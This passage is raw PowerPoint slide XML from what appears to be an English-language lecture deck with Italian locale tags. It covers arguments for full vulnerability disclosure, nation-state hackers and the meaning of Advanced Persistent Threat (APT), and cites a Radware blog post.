              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> software.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Proponents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>disclosure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>argue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>disclosure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> puts more pressure on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vendor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>faster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> create and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ship</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a dix and to care more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> security in the first place</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311273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0248494A-A431-45C3-A06C-8CDE54D0E0EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E43DE58A-3B32-47EE-A72F-EA4486B6824F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Nation/state hackers: power games.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{426B078A-5691-4D11-BB80-6E46BD86E866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2752725" y="6537574"/>
            <a:ext cx="8324850" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.radware.com/security/attack-types-and-vectors/2019/12/nation-state-attacks-motivations-consequences/</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CasellaDiTesto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF091F64-9316-416E-8A4D-0B9F45A8911B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="232325" y="1021640"/>
            <a:ext cx="9206950" cy="5909310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>kind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of hackers are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>generally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>involved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> actions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>named</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> APT (Advanced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Threat</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These</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of malware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>but</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>rather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>well-resourced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of a wide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>variety</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>intrusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>technologies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> and malware to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>selected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> targets, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> business or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>political</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APTs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>differ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>types</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>their</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>careful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>selection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>often</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>stealty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>intrusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>efforts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>extended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>periods</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They</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>named</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>characteristics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>Advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>: use by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t>wide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>variety</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>intrusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>technologies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> and malware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>including</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>development</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> of custom malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>determined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> over an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>extended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>period</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>against</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>chosen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> target in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>maximize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> the chance of success.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>threats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>selected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>organized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>capable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>well-funded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>intent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> to compromise the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>specifically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>chosen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> target. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>active</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>involvement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> of people in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>greatly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>raises</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> due to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>automated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> tools, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>likelihood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>successful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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469388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B770701B-5D27-4906-9F13-9396879D7ADD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5302605-987A-4972-A2EA-F5C9DCB9B574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Advanced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> focus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7">
